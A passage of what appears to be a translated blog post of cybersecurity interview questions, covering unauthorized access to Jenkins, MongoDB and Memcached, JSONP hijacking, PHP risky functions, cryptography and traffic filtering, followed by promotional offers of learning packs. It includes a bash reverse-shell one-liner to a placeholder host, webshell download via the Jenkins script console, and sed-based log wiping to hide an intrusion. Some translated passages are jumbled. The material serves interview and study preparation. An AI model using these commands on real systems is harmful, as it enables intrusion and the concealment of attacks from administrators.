c. Reverse the shell through crontab
d. Use slave master-slave mode
Repair

Password verification
Run with reduced rights
Restrict ip/modify port

3. Jenkins unauthorized access

4. Unauthorized access to MongoDB

The attacker enters the script command execution interface through unauthorized access to execute the attack command

println "ifconfig -a".execute().text Execute some system commands, use wget to download webshell

When no parameters are added when the MongoDB service is started, there is no permission verification by default, and the database can be accessed remotely. Users who log in can perform any high-risk operations such as adding, deleting, modifying, and checking the database through the default port without a password.
protection

Add authentication for MongoDB: 1) Add –auth parameter when MongoDB starts 2) Add users to MongoDB: use admin #Use admin library db.addUser("root", "123456") #Add user db with username root password 123456. auth("root", "123456") #Verify whether the addition is successful, return 1 to indicate success 2. Disable HTTP and REST ports MongoDB itself has an HTTP service and supports REST interfaces. These interfaces are disabled by default after 2.6. By default, mongoDB will use the default port to listen to web services. Generally, remote management through the web is not required, and it is recommended to disable it. Modify the configuration file or select –nohttpinterface parameter nohttpinterface=false at startup 3. Limit the binding IP Add the parameter –bind_ip 127.0.0.1 at startup or add the following content in the /etc/mongodb.conf file: bind_ip = 127.0.0.1

5. Unauthorized access to Memcache

Memcached is a commonly used key-value caching system. Since it does not have a permission control module, the Memcache service open to the public network is easily found by attackers. Attackers can directly read sensitive information in Memcached through command interaction. .
use

a. Log in to the machine and execute the netstat -an |more command to check the port monitoring status. The echo 0.0.0.0:11211 indicates that monitoring is performed on all network cards, and there is an unauthorized access vulnerability of memcached.

b. telnet 11211, or nc -vv 11211, if the connection is successful, it means that there is a vulnerability.
Vulnerability hardening

a. Set memchached to only allow local access b. Forbid external network access to Memcached port 11211 c. Add --enable-sasl when compiling to enable SASL authentication

6.
The principle of reading FFMPEG local files

Encrypt the payload into a segment byte that will be executed by calling the encryption API. But in the specific answer project, I only answered SSRF old hole, m3u8 header, offset, encryption.

19. Safety Knowledge

1、WEB

Common WEB development JAVA framework

STRUTS, SPRING common java framework vulnerabilities In fact, when the interviewer asked this question, I didn't know what he was going to ask. I mentioned struts' 045 048, java common deserialization. 045 Error handling introduces ognl expressions. 048 In the process of encapsulating actions, there is a step of calling getstackvalue to recursively obtain the deserialization operation objects of ognl expressions, and introduce them by means. The reflection mechanism of apache common and the rewriting of readobject, in fact, I can't remember the specifics. . . Then this part is over

Same Origin Policy

The same-origin policy restricts different sources from reading or setting the attribute content of the current document. Distinguish between different sources: protocol, domain name, subdomain name, IP, port, when the above are different, they are different sources.

Jsonp security attack and defense technology, how to write Jsonp attack page

Security attack and defense content related to Jsonp

JSON hijacking, Callback can be defined, JSONP content can be defined, and Content-type is not json.

attack page

JSON hijacking, cross-domain hijacking of sensitive information, the page is similar to

function wooyun(v){
alert(v.username);
}

When the Content-type is incorrect, JSONP and Callback content can be defined to cause XSS. For JSONP, FLASH and other applications, refer to Chuangyu's JSONP security attack and defense technology.

2、PHP

Functions involved in command execution in php

代码执行：eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function()

文件读取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

Command execution: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()
bypass the disable function of php in safe mode

DL functions, component vulnerabilities, environment variables.
PHP weak typing

== When comparing, it will first convert the string type into the same, and then compare

If comparing a number to a string or comparing a string involving numeric content, the string is converted to a number and the comparison is performed as a number

A string starting with 0e is equal to 0

3. Database

Where various database files are stored

mysql:
/usr/local/mysql/data/
C:\ProgramData\MySQL\MySQL Server 5.6\Data
oracle:$ORACLE\_BASE/oradata/$ORACLE_SID/

4. System

How to clean up logs

meterpreter:
What logs need to be cleared after clearev invades the Linux server?

Web logs, such as apache's access.log, error.log. It is too obvious to clear the log directly, and generally use sed for directional clearing

e.g. sed -i -e ‘/192.169.1.1/d’

The clearing of the history command is also a directed clearing of ~/.bash_history

Clearing of wtmp logs, /var/log/wtmp

What are the commands to clear the login log /var/log/secure
LINUX
to check the current port connection? Differences and advantages and disadvantages of netstat and ss commands

netstat -antp ss -l

The advantage of ss is that it can display more and more detailed information about TCP and connection status, and it is faster and more efficient than netstat.
Common commands for reverse shell? Which kind of shell usually rebounds? Why?

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

What information can be obtained through the /proc directory of the Linux system, and what applications can this information be used for security?

ls /proc

System information, hardware information, kernel version, loaded modules, and processes.
In the Linux system, which configuration items of configuration files are detected can improve the security of SSH.

/etc/ssh/sshd___configiptables configuration
How to view the last 100 lines of file content with one command

tail -n 100 filename

How does Windows
reinforce the Windows desktop working environment in a domain environment? Please give your thoughts.

5. Cryptography

The specific working steps of AES/DES
RSA algorithm

Encryption:
ciphertext=plaintext^EmodN

RSA encryption is the process of dividing the E power of the plaintext by N and finding the remainder
Public key = (E, N)

Decryption:
plaintext=ciphertext^DmodN private key=(D,N)

Three parameters n, e1, e2

n is the integral of two large prime numbers p, q
Encryption mode of block cipher
How to generate a safe random number?

Quoting the answer of a previous senior, random numbers can be generated through some physical systems, such as voltage fluctuations, seek time of disk heads when reading/writing, and noise of electromagnetic waves in the air.
SSL handshake process

Establish a TCP connection, the client sends an SSL request, the server processes the SSL request, the client sends the random data encrypted by the public key, the server decrypts the encrypted random data with the private key and negotiates the password, the server and the client use The cipher generates the encryption algorithm and the key key, and then communicates normally. This part was originally forgotten, but when I watched SSL Pinning before, I seemed to remember a picture in my mind. After struggling for a long time, I was still not sure, so I gave up. . .
What are the differences between symmetric encryption and asymmetric encryption?

6、TCP/IP

The process of TCP three-way handshake and the corresponding state transition

(1) The client sends a SYN packet to the server, including the port number used by the client and the initial serial number x; (2) After receiving the
SYN packet sent by the client, the server sends a SYN and ACK to the client The TCP message with both bits set includes the confirmation number xx1 and the initial sequence number y of the server;
(3) After receiving the SYNSACK message returned by the server, the client returns a confirmation number yy1 and sequence number xx1 to the server ACK message, a standard TCP connection is completed.
The difference between TCP and UDP protocols

tcp is connection-oriented, udp is message-oriented, tcp has many requirements for system
resources

a. The client sends a request to the server.
b. The server returns the certificate and public key. The public key exists as part of the certificate.
c. The client verifies the validity of the certificate and public key. If valid, a shared secret is generated. Key and use the public key to encrypt and send to the server
d, the server uses the private key to decrypt the data, and uses the received shared key to encrypt the data, and sends it to the client
e, the client uses the shared key to decrypt the data
f, SSL encryption build

7. Traffic analysis

Wireshark simple filtering rules

filter ip:

Filter source ip address: ip.src1.1.1.1;, destination ip address: ip.dst1.1.1.1;

Filter port:

Filter port 80: tcp.port80, source port: tcp.srcport80, destination port: tcp.dstport==80

Protocol filtering:

Just enter the protocol name directly, such as http protocol http

http pattern filtering:

Filter get/post package http.request.mothod=="GET/POST"

8. Firewall

Briefly describe several basic configuration reinforcement items commonly used in network devices such as routers, switches, and firewalls, as well as configuration methods.

Partners who need a full set of pdf versions can send [ask for sharing] in the comment area, and I will send them one by one

Digression

Many people who are new to the computer industry or graduates of computer-related majors have encountered obstacles everywhere due to lack of practical experience. Let's look at two sets of data:

• The 2023 national college graduates are expected to reach 11.58 million, and the employment situation is severe;

• According to the data released by the National Network Security Publicity Week, by 2027, the shortage of network security personnel in my country will reach 3.27 million.

On the one hand, the employment situation of fresh graduates is severe every year, and on the other hand, there is a gap of one million cyber security talents.

On June 9, the 2023 edition of the Employment Blue Book of MyCOS Research (including the 2023 Employment Report for Undergraduates in China and the Employment Report for Higher Vocational Students in China in 2023) was officially released.

Top 10 Majors with Higher Monthly Salary for 2022 College Graduates

The monthly income of undergraduate computer science majors and higher vocational automation majors is relatively high. The monthly income of the 2022 class of undergraduate computer science and higher vocational automation majors is 6,863 yuan and 5,339 yuan, respectively. Among them, the starting salary of undergraduate computer majors is basically the same as that of the 2021 class, and the monthly income of higher vocational automation majors has increased significantly. The 2022 class of overtaking railway transportation majors (5295 yuan) ranks first.

Specifically, depending on the major, the major with a higher monthly income for undergraduates in 2022 is information security (7579 yuan). Compared with the class of 2018, undergraduate majors related to artificial intelligence, such as electronic science and technology, automation, performed well, and their starting salaries increased by 19% compared with five years ago. Although data science and big data technology are newly added majors in recent years, they have performed well, and have ranked among the top three majors with higher monthly income half a year after graduation for the 2022 class of undergraduates. The only humanities and social science major that entered the top 10 undergraduate high-paying list five years ago-French has dropped out of the top 10.

"There is no national security without cybersecurity". At present, network security has been elevated to the height of national strategy and has become one of the most important factors affecting national security and social stability.

Characteristics of the network security industry

1. The employment salary is very high, and the salary rises quickly. In 2021, Liepin.com released the highest employment salary in the network security industry, which is 337,700 yuan per capita!

2. There is a large talent gap and many employment opportunities

On September 18, 2019, the official website of the "Central People's Government of the People's Republic of China" published: my country needs 1.4 million cyberspace security talents, but schools across the country train less than 1.5 million people each year. Liepin.com's "Cyber ​​Security Report for the First Half of 2021" predicts that the demand for cyber security talents will be 3 million in 2027, and there are only 100,000 employees currently engaged in the cyber security industry.

The industry has a lot of room for development and many jobs

Since the establishment of the network security industry, dozens of new network security industry positions have been added: network security experts, network security analysts, security consultants, network security engineers, security architects, security operation and maintenance engineers, penetration engineers, information security management Data Security Engineer, Network Security Operations Engineer, Network Security Emergency Response Engineer, Data Appraiser, Network Security Product Manager, Network Security Service Engineer, Network Security Trainer, Network Security Auditor, Threat Intelligence Analysis Engineer, Disaster Recovery Professional , Actual combat offensive and defensive professionals...

Great career potential

The network security major has strong technical characteristics, especially mastering the core network architecture and security technology in the work, which has an irreplaceable competitive advantage in career development.

With the continuous improvement of personal ability, the professional value of the work will also increase with the enrichment of one's own experience and the maturity of project operation, and the appreciation space is bullish all the way, which is the main reason why it is popular with everyone.

To some extent, in the field of network security, just like the doctor profession, the older you are, the more popular you become. Because the technology becomes more mature, the work will naturally be valued, and promotion and salary increase are a matter of course.

How to Learn Hacking & Cyber ​​Security

Today, as long as you give my article a thumbs-up, I will share my private collection of online security learning materials with you for free, so let’s see what is there.

1. Learning Roadmap

There are also many things to learn in attack and defense. I have written all the specific things to learn in the roadmap above. If you can learn them, you will have no problem getting a job or taking private jobs.

2. Video Tutorial

Although there are many learning resources on the Internet, they are basically incomplete. This is a video tutorial on cyber security recorded by myself. I have a supporting video explanation for every knowledge point in the above roadmap.

The content covers the study of network security law, network security operation and other guarantee assessment, penetration testing basics, detailed explanation of vulnerabilities, basic computer knowledge, etc., which are all learning contents that must be known when getting started with network security.

(It’s all packed into one piece and cannot be unfolded one by one. There are more than 300 episodes in total)

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing

3. Technical documents and e-books

The technical documents are also compiled by myself, including my experience and technical points of participating in large-scale network security operations, CTF and SRC vulnerability mining. There are also more than 200 e-books. Due to the sensitivity of the content, I will not show them one by one.

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing

4. Toolkit, interview questions and source code

"If you want to do a good job, you must first sharpen your tools." I have summarized dozens of the most popular hacking tools for everyone. The scope of coverage mainly focuses on information collection, Android hacking tools, automation tools, phishing, etc. Interested students should not miss it.

There is also the source code of the case and the corresponding toolkit mentioned in my video, which can be taken away if needed.

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing

Finally, there are interview questions about Internet security that I have sorted out in the past few years. If you are looking for a job in Internet security, they will definitely help you a lot.

These questions are often encountered in interviews with Sangfor, Qi Anxin, Tencent or other major companies. If you have good questions or good insights, please share them.

Reference analysis: Sangfor official website, Qi Anxin official website, Freebuf, csdn, etc.

Content features: clear organization, including graphic representation, which is easier to understand.

Summary of content: Including intranet, operating system, protocol, penetration test, security service, vulnerability, injection, XSS, CSRF, SSRF, file upload, file download, file inclusion, XXE, logic vulnerability, tool, SQLmap, NMAP, BP, MSF…

Due to limited space, only part of the information is shown, you need to click the link below to get it

CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing